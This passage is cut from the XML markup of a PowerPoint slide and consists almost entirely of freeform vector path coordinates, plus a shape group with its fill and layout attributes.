                    <a:pt x="2283" y="4389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2210" y="4473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026" y="4751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="4888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="4762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511" y="4568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="5077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1937" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="5134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530" y="5339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="5486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913" y="5539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2866" y="5591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2798" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2834" y="5717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893" y="5607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2945" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="5455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3591" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3805" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3753" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3695" y="5597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="5791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3249" y="5812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3176" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3029" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320" y="5744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="5665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="5618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2021" y="5565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721" y="5245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680" y="5187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617" y="5061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1507" y="4720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490" y="4646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="3827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1669" y="3759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="3397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="3350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2094" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231" y="3218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="3187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756" y="3066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="3071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396" y="3160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3632" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="3334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3974" y="3586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026" y="3659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4126" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4163" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4199" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4263" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4278" y="4468"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4252" y="4426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173" y="4342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4205" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1564" y="3969"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1574" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611" y="4032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="396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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="390" name="Group 389"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5104871" y="2231080"/>
              <a:ext cx="1286311" cy="1494083"/>
              <a:chOff x="5754688" y="1204913"/>
              <a:chExt cx="1955800" cy="2271712"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="391" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5754688" y="1204913"/>
                <a:ext cx="222250" cy="284162"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 616"/>
                  <a:gd name="T1" fmla="*/ 640 h 788"/>
                  <a:gd name="T2" fmla="*/ 43 w 616"/>
                  <a:gd name="T3" fmla="*/ 556 h 788"/>
                  <a:gd name="T4" fmla="*/ 69 w 616"/>
                  <a:gd name="T5" fmla="*/ 520 h 788"/>
                  <a:gd name="T6" fmla="*/ 95 w 616"/>
                  <a:gd name="T7" fmla="*/ 488 h 788"/>
                  <a:gd name="T8" fmla="*/ 168 w 616"/>
                  <a:gd name="T9" fmla="*/ 436 h 788"/>
                  <a:gd name="T10" fmla="*/ 211 w 616"/>
                  <a:gd name="T11" fmla="*/ 409 h 788"/>
                  <a:gd name="T12" fmla="*/ 337 w 616"/>
                  <a:gd name="T13" fmla="*/ 352 h 788"/>
                  <a:gd name="T14" fmla="*/ 389 w 616"/>
                  <a:gd name="T15" fmla="*/ 330 h 788"/>
                  <a:gd name="T16" fmla="*/ 421 w 616"/>
                  <a:gd name="T17" fmla="*/ 299 h 788"/>
                  <a:gd name="T18" fmla="*/ 436 w 616"/>
                  <a:gd name="T19" fmla="*/ 283 h 788"/>
                  <a:gd name="T20" fmla="*/ 447 w 616"/>
                  <a:gd name="T21" fmla="*/ 267 h 788"/>
                  <a:gd name="T22" fmla="*/ 462 w 616"/>
                  <a:gd name="T23" fmla="*/ 220 h 788"/>
                  <a:gd name="T24" fmla="*/ 473 w 616"/>
                  <a:gd name="T25" fmla="*/ 163 h 788"/>
                  <a:gd name="T26" fmla="*/ 462 w 616"/>
                  <a:gd name="T27" fmla="*/ 136 h 788"/>
                  <a:gd name="T28" fmla="*/ 441 w 616"/>
                  <a:gd name="T29" fmla="*/ 115 h 788"/>
                  <a:gd name="T30" fmla="*/ 426 w 616"/>
                  <a:gd name="T31" fmla="*/ 110 h 788"/>
                  <a:gd name="T32" fmla="*/ 378 w 616"/>
                  <a:gd name="T33" fmla="*/ 105 h 788"/>
                  <a:gd name="T34" fmla="*/ 363 w 616"/>
                  <a:gd name="T35" fmla="*/ 115 h 788"/>
                  <a:gd name="T36" fmla="*/ 347 w 616"/>
                  <a:gd name="T37" fmla="*/ 126 h 788"/>
                  <a:gd name="T38" fmla="*/ 321 w 616"/>
                  <a:gd name="T39" fmla="*/ 168 h 788"/>
                  <a:gd name="T40" fmla="*/ 300 w 616"/>
                  <a:gd name="T41" fmla="*/ 220 h 788"/>
                  <a:gd name="T42" fmla="*/ 174 w 616"/>
                  <a:gd name="T43" fmla="*/ 147 h 788"/>
                  <a:gd name="T44" fmla="*/ 190 w 616"/>
                  <a:gd name="T45" fmla="*/ 99 h 788"/>
                  <a:gd name="T46" fmla="*/ 242 w 616"/>
                  <a:gd name="T47" fmla="*/ 36 h 788"/>
                  <a:gd name="T48" fmla="*/ 279 w 616"/>
                  <a:gd name="T49" fmla="*/ 16 h 788"/>
                  <a:gd name="T50" fmla="*/ 357 w 616"/>
                  <a:gd name="T51" fmla="*/ 0 h 788"/>
                  <a:gd name="T52" fmla="*/ 457 w 616"/>
                  <a:gd name="T53" fmla="*/ 16 h 788"/>
                  <a:gd name="T54" fmla="*/ 504 w 616"/>
                  <a:gd name="T55" fmla="*/ 36 h 788"/>
                  <a:gd name="T56" fmla="*/ 578 w 616"/>
                  <a:gd name="T57" fmla="*/ 89 h 788"/>
                  <a:gd name="T58" fmla="*/ 599 w 616"/>
                  <a:gd name="T59" fmla="*/ 120 h 788"/>
                  <a:gd name="T60" fmla="*/ 615 w 616"/>
                  <a:gd name="T61" fmla="*/ 194 h 788"/>
                  <a:gd name="T62" fmla="*/ 599 w 616"/>
                  <a:gd name="T63" fmla="*/ 278 h 788"/>
                  <a:gd name="T64" fmla="*/ 588 w 616"/>
                  <a:gd name="T65" fmla="*/ 309 h 788"/>
                  <a:gd name="T66" fmla="*/ 573 w 616"/>
                  <a:gd name="T67" fmla="*/ 341 h 788"/>
                  <a:gd name="T68" fmla="*/ 536 w 616"/>
                  <a:gd name="T69" fmla="*/ 388 h 788"/>
                  <a:gd name="T70" fmla="*/ 515 w 616"/>
                  <a:gd name="T71" fmla="*/ 409 h 788"/>
                  <a:gd name="T72" fmla="*/ 484 w 616"/>
                  <a:gd name="T73" fmla="*/ 430 h 788"/>
                  <a:gd name="T74" fmla="*/ 315 w 616"/>
                  <a:gd name="T75" fmla="*/ 509 h 788"/>
                  <a:gd name="T76" fmla="*/ 274 w 616"/>
                  <a:gd name="T77" fmla="*/ 530 h 788"/>
                  <a:gd name="T78" fmla="*/ 247 w 616"/>
                  <a:gd name="T79" fmla="*/ 546 h 788"/>
                  <a:gd name="T80" fmla="*/ 205 w 616"/>
                  <a:gd name="T81" fmla="*/ 588 h 788"/>
                  <a:gd name="T82" fmla="*/ 431 w 616"/>
                  <a:gd name="T83" fmla="*/ 787 h 7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616" h="788">
                    <a:moveTo>
                      <a:pt x="0" y="640"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="126"/>
                    </a:lnTo>
